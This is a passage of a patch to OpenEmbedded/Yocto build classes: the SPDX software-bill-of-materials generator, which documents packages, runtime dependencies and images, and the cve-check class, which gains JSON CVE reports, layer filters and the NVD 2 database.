536 cpe_ids = oe.cve_check.get_cpe_ids(d.getVar("CVE_PRODUCT"), d.getVar("CVE_VERSION"))
537 if cpe_ids:
538 for cpe_id in cpe_ids:
539 cpe = oe.spdx.SPDXExternalReference()
540 cpe.referenceCategory = "SECURITY"
541 cpe.referenceType = "http://spdx.org/rdf/references/cpe23Type"
542 cpe.referenceLocator = cpe_id
543 recipe.externalRefs.append(cpe)
544
545 doc.packages.append(recipe)
546 doc.add_relationship(doc, "DESCRIBES", recipe)
547
548 add_download_packages(d, doc, recipe)
549
550 if process_sources(d) and include_sources:
551 recipe_archive = deploy_dir_spdx / "recipes" / (doc.name + ".tar.gz")
552 with optional_tarfile(recipe_archive, archive_sources) as archive:
553 spdx_get_src(d)
554
555 add_package_files(
556 d,
557 doc,
558 recipe,
559 spdx_workdir,
560 lambda file_counter: "SPDXRef-SourceFile-%s-%d" % (d.getVar("PN"), file_counter),
561 lambda filepath: ["SOURCE"],
562 ignore_dirs=[".git"],
563 ignore_top_level_dirs=["temp"],
564 archive=archive,
565 )
566
567 if archive is not None:
568 recipe.packageFileName = str(recipe_archive.name)
569
570 dep_recipes = collect_dep_recipes(d, doc, recipe)
571
572 doc_sha1 = oe.sbom.write_doc(d, doc, "recipes", indent=get_json_indent(d))
573 dep_recipes.append(oe.sbom.DepRecipe(doc, doc_sha1, recipe))
574
575 recipe_ref = oe.spdx.SPDXExternalDocumentRef()
576 recipe_ref.externalDocumentId = "DocumentRef-recipe-" + recipe.name
577 recipe_ref.spdxDocument = doc.documentNamespace
578 recipe_ref.checksum.algorithm = "SHA1"
579 recipe_ref.checksum.checksumValue = doc_sha1
580
581 sources = collect_dep_sources(d, dep_recipes)
582 found_licenses = {license.name:recipe_ref.externalDocumentId + ":" + license.licenseId for license in doc.hasExtractedLicensingInfos}
583
584 if not recipe_spdx_is_native(d, recipe):
585 bb.build.exec_func("read_subpackage_metadata", d)
586
587 pkgdest = Path(d.getVar("PKGDEST"))
588 for package in d.getVar("PACKAGES").split():
589 if not oe.packagedata.packaged(package, d):
590 continue
591
592 package_doc = oe.spdx.SPDXDocument()
593 pkg_name = d.getVar("PKG:%s" % package) or package
594 package_doc.name = pkg_name
595 package_doc.documentNamespace = get_doc_namespace(d, package_doc)
596 package_doc.creationInfo.created = creation_time
597 package_doc.creationInfo.comment = "This document was created by analyzing packages created during the build."
598 package_doc.creationInfo.licenseListVersion = d.getVar("SPDX_LICENSE_DATA")["licenseListVersion"]
599 package_doc.creationInfo.creators.append("Tool: OpenEmbedded Core create-spdx.bbclass")
600 package_doc.creationInfo.creators.append("Organization: %s" % d.getVar("SPDX_ORG"))
601 package_doc.creationInfo.creators.append("Person: N/A ()")
602 package_doc.externalDocumentRefs.append(recipe_ref)
603
604 package_license = d.getVar("LICENSE:%s" % package) or d.getVar("LICENSE")
605
606 spdx_package = oe.spdx.SPDXPackage()
607
608 spdx_package.SPDXID = oe.sbom.get_package_spdxid(pkg_name)
609 spdx_package.name = pkg_name
610 spdx_package.versionInfo = d.getVar("PV")
611 spdx_package.licenseDeclared = convert_license_to_spdx(package_license, package_doc, d, found_licenses)
612 spdx_package.supplier = d.getVar("SPDX_SUPPLIER")
613
614 package_doc.packages.append(spdx_package)
615
616 package_doc.add_relationship(spdx_package, "GENERATED_FROM", "%s:%s" % (recipe_ref.externalDocumentId, recipe.SPDXID))
617 package_doc.add_relationship(package_doc, "DESCRIBES", spdx_package)
618
619 package_archive = deploy_dir_spdx / "packages" / (package_doc.name + ".tar.gz")
620 with optional_tarfile(package_archive, archive_packaged) as archive:
621 package_files = add_package_files(
622 d,
623 package_doc,
624 spdx_package,
625 pkgdest / package,
626 lambda file_counter: oe.sbom.get_packaged_file_spdxid(pkg_name, file_counter),
627 lambda filepath: ["BINARY"],
628 ignore_top_level_dirs=['CONTROL', 'DEBIAN'],
629 archive=archive,
630 )
631
632 if archive is not None:
633 spdx_package.packageFileName = str(package_archive.name)
634
635 add_package_sources_from_debug(d, package_doc, spdx_package, package, package_files, sources)
636
637 oe.sbom.write_doc(d, package_doc, "packages", indent=get_json_indent(d))
638}
639# NOTE: depending on do_unpack is a hack that is necessary to get it's dependencies for archive the source
640addtask do_create_spdx after do_package do_packagedata do_unpack before do_populate_sdk do_build do_rm_work
641
642SSTATETASKS += "do_create_spdx"
643do_create_spdx[sstate-inputdirs] = "${SPDXDEPLOY}"
644do_create_spdx[sstate-outputdirs] = "${DEPLOY_DIR_SPDX}"
645
646python do_create_spdx_setscene () {
647 sstate_setscene(d)
648}
649addtask do_create_spdx_setscene
650
651do_create_spdx[dirs] = "${SPDXWORK}"
652do_create_spdx[cleandirs] = "${SPDXDEPLOY} ${SPDXWORK}"
653do_create_spdx[depends] += "${PATCHDEPENDENCY}"
654do_create_spdx[deptask] = "do_create_spdx"
655
656def collect_package_providers(d):
657 from pathlib import Path
658 import oe.sbom
659 import oe.spdx
660 import json
661
662 deploy_dir_spdx = Path(d.getVar("DEPLOY_DIR_SPDX"))
663
664 providers = {}
665
666 taskdepdata = d.getVar("BB_TASKDEPDATA", False)
667 deps = sorted(set(
668 dep[0] for dep in taskdepdata.values() if dep[0] != d.getVar("PN")
669 ))
670 deps.append(d.getVar("PN"))
671
672 for dep_pn in deps:
673 recipe_data = oe.packagedata.read_pkgdata(dep_pn, d)
674
675 for pkg in recipe_data.get("PACKAGES", "").split():
676
677 pkg_data = oe.packagedata.read_subpkgdata_dict(pkg, d)
678 rprovides = set(n for n, _ in bb.utils.explode_dep_versions2(pkg_data.get("RPROVIDES", "")).items())
679 rprovides.add(pkg)
680
681 for r in rprovides:
682 providers[r] = pkg
683
684 return providers
685
686collect_package_providers[vardepsexclude] += "BB_TASKDEPDATA"
687
688python do_create_runtime_spdx() {
689 from datetime import datetime, timezone
690 import oe.sbom
691 import oe.spdx
692 import oe.packagedata
693 from pathlib import Path
694
695 deploy_dir_spdx = Path(d.getVar("DEPLOY_DIR_SPDX"))
696 spdx_deploy = Path(d.getVar("SPDXRUNTIMEDEPLOY"))
697 is_native = bb.data.inherits_class("native", d) or bb.data.inherits_class("cross", d)
698
699 creation_time = datetime.now(tz=timezone.utc).strftime("%Y-%m-%dT%H:%M:%SZ")
700
701 providers = collect_package_providers(d)
702
703 if not is_native:
704 bb.build.exec_func("read_subpackage_metadata", d)
705
706 dep_package_cache = {}
707
708 pkgdest = Path(d.getVar("PKGDEST"))
709 for package in d.getVar("PACKAGES").split():
710 localdata = bb.data.createCopy(d)
711 pkg_name = d.getVar("PKG:%s" % package) or package
712 localdata.setVar("PKG", pkg_name)
713 localdata.setVar('OVERRIDES', d.getVar("OVERRIDES", False) + ":" + package)
714
715 if not oe.packagedata.packaged(package, localdata):
716 continue
717
718 pkg_spdx_path = deploy_dir_spdx / "packages" / (pkg_name + ".spdx.json")
719
720 package_doc, package_doc_sha1 = oe.sbom.read_doc(pkg_spdx_path)
721
722 for p in package_doc.packages:
723 if p.name == pkg_name:
724 spdx_package = p
725 break
726 else:
727 bb.fatal("Package '%s' not found in %s" % (pkg_name, pkg_spdx_path))
728
729 runtime_doc = oe.spdx.SPDXDocument()
730 runtime_doc.name = "runtime-" + pkg_name
731 runtime_doc.documentNamespace = get_doc_namespace(localdata, runtime_doc)
732 runtime_doc.creationInfo.created = creation_time
733 runtime_doc.creationInfo.comment = "This document was created by analyzing package runtime dependencies."
734 runtime_doc.creationInfo.licenseListVersion = d.getVar("SPDX_LICENSE_DATA")["licenseListVersion"]
735 runtime_doc.creationInfo.creators.append("Tool: OpenEmbedded Core create-spdx.bbclass")
736 runtime_doc.creationInfo.creators.append("Organization: %s" % d.getVar("SPDX_ORG"))
737 runtime_doc.creationInfo.creators.append("Person: N/A ()")
738
739 package_ref = oe.spdx.SPDXExternalDocumentRef()
740 package_ref.externalDocumentId = "DocumentRef-package-" + package
741 package_ref.spdxDocument = package_doc.documentNamespace
742 package_ref.checksum.algorithm = "SHA1"
743 package_ref.checksum.checksumValue = package_doc_sha1
744
745 runtime_doc.externalDocumentRefs.append(package_ref)
746
747 runtime_doc.add_relationship(
748 runtime_doc.SPDXID,
749 "AMENDS",
750 "%s:%s" % (package_ref.externalDocumentId, package_doc.SPDXID)
751 )
752
753 deps = bb.utils.explode_dep_versions2(localdata.getVar("RDEPENDS") or "")
754 seen_deps = set()
755 for dep, _ in deps.items():
756 if dep in seen_deps:
757 continue
758
759 if dep not in providers:
760 continue
761
762 dep = providers[dep]
763
764 if not oe.packagedata.packaged(dep, localdata):
765 continue
766
767 dep_pkg_data = oe.packagedata.read_subpkgdata_dict(dep, d)
768 dep_pkg = dep_pkg_data["PKG"]
769
770 if dep in dep_package_cache:
771 (dep_spdx_package, dep_package_ref) = dep_package_cache[dep]
772 else:
773 dep_path = deploy_dir_spdx / "packages" / ("%s.spdx.json" % dep_pkg)
774
775 spdx_dep_doc, spdx_dep_sha1 = oe.sbom.read_doc(dep_path)
776
777 for pkg in spdx_dep_doc.packages:
778 if pkg.name == dep_pkg:
779 dep_spdx_package = pkg
780 break
781 else:
782 bb.fatal("Package '%s' not found in %s" % (dep_pkg, dep_path))
783
784 dep_package_ref = oe.spdx.SPDXExternalDocumentRef()
785 dep_package_ref.externalDocumentId = "DocumentRef-runtime-dependency-" + spdx_dep_doc.name
786 dep_package_ref.spdxDocument = spdx_dep_doc.documentNamespace
787 dep_package_ref.checksum.algorithm = "SHA1"
788 dep_package_ref.checksum.checksumValue = spdx_dep_sha1
789
790 dep_package_cache[dep] = (dep_spdx_package, dep_package_ref)
791
792 runtime_doc.externalDocumentRefs.append(dep_package_ref)
793
794 runtime_doc.add_relationship(
795 "%s:%s" % (dep_package_ref.externalDocumentId, dep_spdx_package.SPDXID),
796 "RUNTIME_DEPENDENCY_OF",
797 "%s:%s" % (package_ref.externalDocumentId, spdx_package.SPDXID)
798 )
799 seen_deps.add(dep)
800
801 oe.sbom.write_doc(d, runtime_doc, "runtime", spdx_deploy, indent=get_json_indent(d))
802}
803
804addtask do_create_runtime_spdx after do_create_spdx before do_build do_rm_work
805SSTATETASKS += "do_create_runtime_spdx"
806do_create_runtime_spdx[sstate-inputdirs] = "${SPDXRUNTIMEDEPLOY}"
807do_create_runtime_spdx[sstate-outputdirs] = "${DEPLOY_DIR_SPDX}"
808
809python do_create_runtime_spdx_setscene () {
810 sstate_setscene(d)
811}
812addtask do_create_runtime_spdx_setscene
813
814do_create_runtime_spdx[dirs] = "${SPDXRUNTIMEDEPLOY}"
815do_create_runtime_spdx[cleandirs] = "${SPDXRUNTIMEDEPLOY}"
816do_create_runtime_spdx[rdeptask] = "do_create_spdx"
817
818def spdx_get_src(d):
819 """
820 save patched source of the recipe in SPDX_WORKDIR.
821 """
822 import shutil
823 spdx_workdir = d.getVar('SPDXWORK')
824 spdx_sysroot_native = d.getVar('STAGING_DIR_NATIVE')
825 pn = d.getVar('PN')
826
827 workdir = d.getVar("WORKDIR")
828
829 try:
830 # The kernel class functions require it to be on work-shared, so we dont change WORKDIR
831 if not is_work_shared_spdx(d):
832 # Change the WORKDIR to make do_unpack do_patch run in another dir.
833 d.setVar('WORKDIR', spdx_workdir)
834 # Restore the original path to recipe's native sysroot (it's relative to WORKDIR).
835 d.setVar('STAGING_DIR_NATIVE', spdx_sysroot_native)
836
837 # The changed 'WORKDIR' also caused 'B' changed, create dir 'B' for the
838 # possibly requiring of the following tasks (such as some recipes's
839 # do_patch required 'B' existed).
840 bb.utils.mkdirhier(d.getVar('B'))
841
842 bb.build.exec_func('do_unpack', d)
843 # Copy source of kernel to spdx_workdir
844 if is_work_shared_spdx(d):
845 share_src = d.getVar('WORKDIR')
846 d.setVar('WORKDIR', spdx_workdir)
847 d.setVar('STAGING_DIR_NATIVE', spdx_sysroot_native)
848 src_dir = spdx_workdir + "/" + d.getVar('PN')+ "-" + d.getVar('PV') + "-" + d.getVar('PR')
849 bb.utils.mkdirhier(src_dir)
850 if bb.data.inherits_class('kernel',d):
851 share_src = d.getVar('STAGING_KERNEL_DIR')
852 cmd_copy_share = "cp -rf " + share_src + "/* " + src_dir + "/"
853 cmd_copy_shared_res = os.popen(cmd_copy_share).read()
854 bb.note("cmd_copy_shared_result = " + cmd_copy_shared_res)
855
856 git_path = src_dir + "/.git"
857 if os.path.exists(git_path):
858 shutils.rmtree(git_path)
859
860 # Make sure gcc and kernel sources are patched only once
861 if not (d.getVar('SRC_URI') == "" or is_work_shared_spdx(d)):
862 bb.build.exec_func('do_patch', d)
863
864 # Some userland has no source.
865 if not os.path.exists( spdx_workdir ):
866 bb.utils.mkdirhier(spdx_workdir)
867 finally:
868 d.setVar("WORKDIR", workdir)
869
870do_rootfs[recrdeptask] += "do_create_spdx do_create_runtime_spdx"
871do_rootfs[cleandirs] += "${SPDXIMAGEWORK}"
872
873ROOTFS_POSTUNINSTALL_COMMAND =+ "image_combine_spdx ; "
874
875do_populate_sdk[recrdeptask] += "do_create_spdx do_create_runtime_spdx"
876do_populate_sdk[cleandirs] += "${SPDXSDKWORK}"
877POPULATE_SDK_POST_HOST_COMMAND:append:task-populate-sdk = " sdk_host_combine_spdx; "
878POPULATE_SDK_POST_TARGET_COMMAND:append:task-populate-sdk = " sdk_target_combine_spdx; "
879
880python image_combine_spdx() {
881 import os
882 import oe.sbom
883 from pathlib import Path
884 from oe.rootfs import image_list_installed_packages
885
886 image_name = d.getVar("IMAGE_NAME")
887 image_link_name = d.getVar("IMAGE_LINK_NAME")
888 imgdeploydir = Path(d.getVar("IMGDEPLOYDIR"))
889 img_spdxid = oe.sbom.get_image_spdxid(image_name)
890 packages = image_list_installed_packages(d)
891
892 combine_spdx(d, image_name, imgdeploydir, img_spdxid, packages, Path(d.getVar("SPDXIMAGEWORK")))
893
894 def make_image_link(target_path, suffix):
895 if image_link_name:
896 link = imgdeploydir / (image_link_name + suffix)
897 if link != target_path:
898 link.symlink_to(os.path.relpath(target_path, link.parent))
899
900 spdx_tar_path = imgdeploydir / (image_name + ".spdx.tar.gz")
901 make_image_link(spdx_tar_path, ".spdx.tar.gz")
902}
903
904python sdk_host_combine_spdx() {
905 sdk_combine_spdx(d, "host")
906}
907
908python sdk_target_combine_spdx() {
909 sdk_combine_spdx(d, "target")
910}
911
912def sdk_combine_spdx(d, sdk_type):
913 import oe.sbom
914 from pathlib import Path
915 from oe.sdk import sdk_list_installed_packages
916
917 sdk_name = d.getVar("SDK_NAME") + "-" + sdk_type
918 sdk_deploydir = Path(d.getVar("SDKDEPLOYDIR"))
919 sdk_spdxid = oe.sbom.get_sdk_spdxid(sdk_name)
920 sdk_packages = sdk_list_installed_packages(d, sdk_type == "target")
921 combine_spdx(d, sdk_name, sdk_deploydir, sdk_spdxid, sdk_packages, Path(d.getVar('SPDXSDKWORK')))
922
923def combine_spdx(d, rootfs_name, rootfs_deploydir, rootfs_spdxid, packages, spdx_workdir):
924 import os
925 import oe.spdx
926 import oe.sbom
927 import io
928 import json
929 from datetime import timezone, datetime
930 from pathlib import Path
931 import tarfile
932 import gzip
933
934 creation_time = datetime.now(tz=timezone.utc).strftime("%Y-%m-%dT%H:%M:%SZ")
935 deploy_dir_spdx = Path(d.getVar("DEPLOY_DIR_SPDX"))
936 source_date_epoch = d.getVar("SOURCE_DATE_EPOCH")
937
938 doc = oe.spdx.SPDXDocument()
939 doc.name = rootfs_name
940 doc.documentNamespace = get_doc_namespace(d, doc)
941 doc.creationInfo.created = creation_time
942 doc.creationInfo.comment = "This document was created by analyzing the source of the Yocto recipe during the build."
943 doc.creationInfo.licenseListVersion = d.getVar("SPDX_LICENSE_DATA")["licenseListVersion"]
944 doc.creationInfo.creators.append("Tool: OpenEmbedded Core create-spdx.bbclass")
945 doc.creationInfo.creators.append("Organization: %s" % d.getVar("SPDX_ORG"))
946 doc.creationInfo.creators.append("Person: N/A ()")
947
948 image = oe.spdx.SPDXPackage()
949 image.name = d.getVar("PN")
950 image.versionInfo = d.getVar("PV")
951 image.SPDXID = rootfs_spdxid
952 image.supplier = d.getVar("SPDX_SUPPLIER")
953
954 doc.packages.append(image)
955
956 for name in sorted(packages.keys()):
957 pkg_spdx_path = deploy_dir_spdx / "packages" / (name + ".spdx.json")
958 pkg_doc, pkg_doc_sha1 = oe.sbom.read_doc(pkg_spdx_path)
959
960 for p in pkg_doc.packages:
961 if p.name == name:
962 pkg_ref = oe.spdx.SPDXExternalDocumentRef()
963 pkg_ref.externalDocumentId = "DocumentRef-%s" % pkg_doc.name
964 pkg_ref.spdxDocument = pkg_doc.documentNamespace
965 pkg_ref.checksum.algorithm = "SHA1"
966 pkg_ref.checksum.checksumValue = pkg_doc_sha1
967
968 doc.externalDocumentRefs.append(pkg_ref)
969 doc.add_relationship(image, "CONTAINS", "%s:%s" % (pkg_ref.externalDocumentId, p.SPDXID))
970 break
971 else:
972 bb.fatal("Unable to find package with name '%s' in SPDX file %s" % (name, pkg_spdx_path))
973
974 runtime_spdx_path = deploy_dir_spdx / "runtime" / ("runtime-" + name + ".spdx.json")
975 runtime_doc, runtime_doc_sha1 = oe.sbom.read_doc(runtime_spdx_path)
976
977 runtime_ref = oe.spdx.SPDXExternalDocumentRef()
978 runtime_ref.externalDocumentId = "DocumentRef-%s" % runtime_doc.name
979 runtime_ref.spdxDocument = runtime_doc.documentNamespace
980 runtime_ref.checksum.algorithm = "SHA1"
981 runtime_ref.checksum.checksumValue = runtime_doc_sha1
982
983 # "OTHER" isn't ideal here, but I can't find a relationship that makes sense
984 doc.externalDocumentRefs.append(runtime_ref)
985 doc.add_relationship(
986 image,
987 "OTHER",
988 "%s:%s" % (runtime_ref.externalDocumentId, runtime_doc.SPDXID),
989 comment="Runtime dependencies for %s" % name
990 )
991
992 image_spdx_path = spdx_workdir / (rootfs_name + ".spdx.json")
993
994 with image_spdx_path.open("wb") as f:
995 doc.to_json(f, sort_keys=True, indent=get_json_indent(d))
996
997 num_threads = int(d.getVar("BB_NUMBER_THREADS"))
998
999 visited_docs = set()
1000
1001 index = {"documents": []}
1002
1003 spdx_tar_path = rootfs_deploydir / (rootfs_name + ".spdx.tar.gz")
1004 with gzip.open(spdx_tar_path, "w") as f:
1005 with tarfile.open(fileobj=f, mode="w|") as tar:
1006 def collect_spdx_document(path):
1007 nonlocal tar
1008 nonlocal deploy_dir_spdx
1009 nonlocal source_date_epoch
1010 nonlocal index
1011
1012 if path in visited_docs:
1013 return
1014
1015 visited_docs.add(path)
1016
1017 with path.open("rb") as f:
1018 doc, sha1 = oe.sbom.read_doc(f)
1019 f.seek(0)
1020
1021 if doc.documentNamespace in visited_docs:
1022 return
1023
1024 bb.note("Adding SPDX document %s" % path)
1025 visited_docs.add(doc.documentNamespace)
1026 info = tar.gettarinfo(fileobj=f)
1027
1028 info.name = doc.name + ".spdx.json"
1029 info.uid = 0
1030 info.gid = 0
1031 info.uname = "root"
1032 info.gname = "root"
1033
1034 if source_date_epoch is not None and info.mtime > int(source_date_epoch):
1035 info.mtime = int(source_date_epoch)
1036
1037 tar.addfile(info, f)
1038
1039 index["documents"].append({
1040 "filename": info.name,
1041 "documentNamespace": doc.documentNamespace,
1042 "sha1": sha1,
1043 })
1044
1045 for ref in doc.externalDocumentRefs:
1046 ref_path = deploy_dir_spdx / "by-namespace" / ref.spdxDocument.replace("/", "_")
1047 collect_spdx_document(ref_path)
1048
1049 collect_spdx_document(image_spdx_path)
1050
1051 index["documents"].sort(key=lambda x: x["filename"])
1052
1053 index_str = io.BytesIO(json.dumps(
1054 index,
1055 sort_keys=True,
1056 indent=get_json_indent(d),
1057 ).encode("utf-8"))
1058
1059 info = tarfile.TarInfo()
1060 info.name = "index.json"
1061 info.size = len(index_str.getvalue())
1062 info.uid = 0
1063 info.gid = 0
1064 info.uname = "root"
1065 info.gname = "root"
1066
1067 tar.addfile(info, fileobj=index_str)
diff --git a/meta/classes/create-spdx.bbclass b/meta/classes/create-spdx.bbclass
new file mode 100644
index 0000000000..19c6c0ff0b
--- /dev/null
+++ b/meta/classes/create-spdx.bbclass
@@ -0,0 +1,8 @@
1#
2# Copyright OpenEmbedded Contributors
3#
4# SPDX-License-Identifier: GPL-2.0-only
5#
6# Include this class when you don't care what version of SPDX you get; it will
7# be updated to the latest stable version that is supported
8inherit create-spdx-2.2
diff --git a/meta/classes/cve-check.bbclass b/meta/classes/cve-check.bbclass
index 8086cf05e9..5e6bae1757 100644
--- a/meta/classes/cve-check.bbclass
+++ b/meta/classes/cve-check.bbclass
@@ -20,13 +20,13 @@
20# the only method to check against CVEs. Running this tool 20# the only method to check against CVEs. Running this tool
21# doesn't guarantee your packages are free of CVEs. 21# doesn't guarantee your packages are free of CVEs.
22 22
23# The product name that the CVE database uses. Defaults to BPN, but may need to 23# The product name that the CVE database uses defaults to BPN, but may need to
24# be overriden per recipe (for example tiff.bb sets CVE_PRODUCT=libtiff). 24# be overriden per recipe (for example tiff.bb sets CVE_PRODUCT=libtiff).
25CVE_PRODUCT ??= "${BPN}" 25CVE_PRODUCT ??= "${BPN}"
26CVE_VERSION ??= "${PV}" 26CVE_VERSION ??= "${PV}"
27 27
28CVE_CHECK_DB_DIR ?= "${DL_DIR}/CVE_CHECK" 28CVE_CHECK_DB_DIR ?= "${DL_DIR}/CVE_CHECK"
29CVE_CHECK_DB_FILE ?= "${CVE_CHECK_DB_DIR}/nvdcve_1.1.db" 29CVE_CHECK_DB_FILE ?= "${CVE_CHECK_DB_DIR}/nvdcve_2.db"
30CVE_CHECK_DB_FILE_LOCK ?= "${CVE_CHECK_DB_FILE}.lock" 30CVE_CHECK_DB_FILE_LOCK ?= "${CVE_CHECK_DB_FILE}.lock"
31 31
32CVE_CHECK_LOG ?= "${T}/cve.log" 32CVE_CHECK_LOG ?= "${T}/cve.log"
@@ -34,15 +34,33 @@ CVE_CHECK_TMP_FILE ?= "${TMPDIR}/cve_check"
34CVE_CHECK_SUMMARY_DIR ?= "${LOG_DIR}/cve" 34CVE_CHECK_SUMMARY_DIR ?= "${LOG_DIR}/cve"
35CVE_CHECK_SUMMARY_FILE_NAME ?= "cve-summary" 35CVE_CHECK_SUMMARY_FILE_NAME ?= "cve-summary"
36CVE_CHECK_SUMMARY_FILE ?= "${CVE_CHECK_SUMMARY_DIR}/${CVE_CHECK_SUMMARY_FILE_NAME}" 36CVE_CHECK_SUMMARY_FILE ?= "${CVE_CHECK_SUMMARY_DIR}/${CVE_CHECK_SUMMARY_FILE_NAME}"
37CVE_CHECK_SUMMARY_FILE_NAME_JSON = "cve-summary.json"
38CVE_CHECK_SUMMARY_INDEX_PATH = "${CVE_CHECK_SUMMARY_DIR}/cve-summary-index.txt"
39
40CVE_CHECK_LOG_JSON ?= "${T}/cve.json"
37 41
38CVE_CHECK_DIR ??= "${DEPLOY_DIR}/cve" 42CVE_CHECK_DIR ??= "${DEPLOY_DIR}/cve"
39CVE_CHECK_RECIPE_FILE ?= "${CVE_CHECK_DIR}/${PN}" 43CVE_CHECK_RECIPE_FILE ?= "${CVE_CHECK_DIR}/${PN}"
40CVE_CHECK_MANIFEST ?= "${DEPLOY_DIR_IMAGE}/${IMAGE_NAME}${IMAGE_NAME_SUFFIX}.cve" 44CVE_CHECK_RECIPE_FILE_JSON ?= "${CVE_CHECK_DIR}/${PN}_cve.json"
45CVE_CHECK_MANIFEST ?= "${IMGDEPLOYDIR}/${IMAGE_NAME}${IMAGE_NAME_SUFFIX}.cve"
46CVE_CHECK_MANIFEST_JSON ?= "${IMGDEPLOYDIR}/${IMAGE_NAME}${IMAGE_NAME_SUFFIX}.json"
41CVE_CHECK_COPY_FILES ??= "1" 47CVE_CHECK_COPY_FILES ??= "1"
42CVE_CHECK_CREATE_MANIFEST ??= "1" 48CVE_CHECK_CREATE_MANIFEST ??= "1"
43 49
50# Report Patched or Ignored/Whitelisted CVEs
44CVE_CHECK_REPORT_PATCHED ??= "1" 51CVE_CHECK_REPORT_PATCHED ??= "1"
45 52
53CVE_CHECK_SHOW_WARNINGS ??= "1"
54
55# Provide text output
56CVE_CHECK_FORMAT_TEXT ??= "1"
57
58# Provide JSON output - disabled by default for backward compatibility
59CVE_CHECK_FORMAT_JSON ??= "0"
60
61# Check for packages without CVEs (no issues or missing product name)
62CVE_CHECK_COVERAGE ??= "1"
63
46# Whitelist for packages (PN) 64# Whitelist for packages (PN)
47CVE_CHECK_PN_WHITELIST ?= "" 65CVE_CHECK_PN_WHITELIST ?= ""
48 66
@@ -53,12 +71,43 @@ CVE_CHECK_PN_WHITELIST ?= ""
53# 71#
54CVE_CHECK_WHITELIST ?= "" 72CVE_CHECK_WHITELIST ?= ""
55 73
56# set to "alphabetical" for version using single alphabetical character as increament release 74# Layers to be excluded
75CVE_CHECK_LAYER_EXCLUDELIST ??= ""
76
77# Layers to be included
78CVE_CHECK_LAYER_INCLUDELIST ??= ""
79
80
81# set to "alphabetical" for version using single alphabetical character as increment release
57CVE_VERSION_SUFFIX ??= "" 82CVE_VERSION_SUFFIX ??= ""
58 83
84def generate_json_report(d, out_path, link_path):
85 if os.path.exists(d.getVar("CVE_CHECK_SUMMARY_INDEX_PATH")):
86 import json
87 from oe.cve_check import cve_check_merge_jsons, update_symlinks
88
89 bb.note("Generating JSON CVE summary")
90 index_file = d.getVar("CVE_CHECK_SUMMARY_INDEX_PATH")
91 summary = {"version":"1", "package": []}
92 with open(index_file) as f:
93 filename = f.readline()
94 while filename:
95 with open(filename.rstrip()) as j:
96 data = json.load(j)
97 cve_check_merge_jsons(summary, data)
98 filename = f.readline()
99
100 summary["package"].sort(key=lambda d: d['name'])
101
102 with open(out_path, "w") as f:
103 json.dump(summary, f, indent=2)
104
105 update_symlinks(out_path, link_path)
106
59python cve_save_summary_handler () { 107python cve_save_summary_handler () {
60 import shutil 108 import shutil
61 import datetime 109 import datetime
110 from oe.cve_check import update_symlinks
62 111
63 cve_tmp_file = d.getVar("CVE_CHECK_TMP_FILE") 112 cve_tmp_file = d.getVar("CVE_CHECK_TMP_FILE")
64 113
@@ -71,13 +120,15 @@ python cve_save_summary_handler () {
71 120
72 if os.path.exists(cve_tmp_file): 121 if os.path.exists(cve_tmp_file):
73 shutil.copyfile(cve_tmp_file, cve_summary_file) 122 shutil.copyfile(cve_tmp_file, cve_summary_file)
74 123 cvefile_link = os.path.join(cvelogpath, cve_summary_name)
75 if cve_summary_file and os.path.exists(cve_summary_file): 124 update_symlinks(cve_summary_file, cvefile_link)
76 cvefile_link = os.path.join(cvelogpath, cve_summary_name) 125 bb.plain("Complete CVE report summary created at: %s" % cvefile_link)
77 126
78 if os.path.exists(os.path.realpath(cvefile_link)): 127 if d.getVar("CVE_CHECK_FORMAT_JSON") == "1":
79 os.remove(cvefile_link) 128 json_summary_link_name = os.path.join(cvelogpath, d.getVar("CVE_CHECK_SUMMARY_FILE_NAME_JSON"))
80 os.symlink(os.path.basename(cve_summary_file), cvefile_link) 129 json_summary_name = os.path.join(cvelogpath, "%s-%s.json" % (cve_summary_name, timestamp))
130 generate_json_report(d, json_summary_name, json_summary_link_name)
131 bb.plain("Complete CVE JSON report summary created at: %s" % json_summary_link_name)
81} 132}
82 133
83addhandler cve_save_summary_handler 134addhandler cve_save_summary_handler
@@ -87,23 +138,25 @@ python do_cve_check () {
87 """ 138 """
88 Check recipe for patched and unpatched CVEs 139 Check recipe for patched and unpatched CVEs
89 """ 140 """
141 from oe.cve_check import get_patched_cves
90 142
91 if os.path.exists(d.getVar("CVE_CHECK_DB_FILE")): 143 with bb.utils.fileslocked([d.getVar("CVE_CHECK_DB_FILE_LOCK")], shared=True):
92 try: 144 if os.path.exists(d.getVar("CVE_CHECK_DB_FILE")):
93 patched_cves = get_patches_cves(d) 145 try:
94 except FileNotFoundError: 146 patched_cves = get_patched_cves(d)
95 bb.fatal("Failure in searching patches") 147 except FileNotFoundError:
96 whitelisted, patched, unpatched = check_cves(d, patched_cves) 148 bb.fatal("Failure in searching patches")
97 if patched or unpatched: 149 ignored, patched, unpatched, status = check_cves(d, patched_cves)
98 cve_data = get_cve_info(d, patched + unpatched) 150 if patched or unpatched or (d.getVar("CVE_CHECK_COVERAGE") == "1" and status):
99 cve_write_data(d, patched, unpatched, whitelisted, cve_data) 151 cve_data = get_cve_info(d, patched + unpatched + ignored)
100 else: 152 cve_write_data(d, patched, unpatched, ignored, cve_data, status)
101 bb.note("No CVE database found, skipping CVE check") 153 else:
154 bb.note("No CVE database found, skipping CVE check")
102 155
103} 156}
104 157
105addtask cve_check before do_build after do_fetch 158addtask cve_check before do_build
106do_cve_check[depends] = "cve-update-db-native:do_populate_cve_db" 159do_cve_check[depends] = "cve-update-nvd2-native:do_fetch"
107do_cve_check[nostamp] = "1" 160do_cve_check[nostamp] = "1"
108 161
109python cve_check_cleanup () { 162python cve_check_cleanup () {
@@ -111,10 +164,11 @@ python cve_check_cleanup () {
111 Delete the file used to gather all the CVE information. 164 Delete the file used to gather all the CVE information.
112 """ 165 """
113 bb.utils.remove(e.data.getVar("CVE_CHECK_TMP_FILE")) 166 bb.utils.remove(e.data.getVar("CVE_CHECK_TMP_FILE"))
167 bb.utils.remove(e.data.getVar("CVE_CHECK_SUMMARY_INDEX_PATH"))
114} 168}
115 169
116addhandler cve_check_cleanup 170addhandler cve_check_cleanup
117cve_check_cleanup[eventmask] = "bb.cooker.CookerExit" 171cve_check_cleanup[eventmask] = "bb.event.BuildCompleted"
118 172
119python cve_check_write_rootfs_manifest () { 173python cve_check_write_rootfs_manifest () {
120 """ 174 """
@@ -122,115 +176,107 @@ python cve_check_write_rootfs_manifest () {
122 """ 176 """
123 177
124 import shutil 178 import shutil
179 import json
180 from oe.rootfs import image_list_installed_packages
181 from oe.cve_check import cve_check_merge_jsons, update_symlinks
125 182
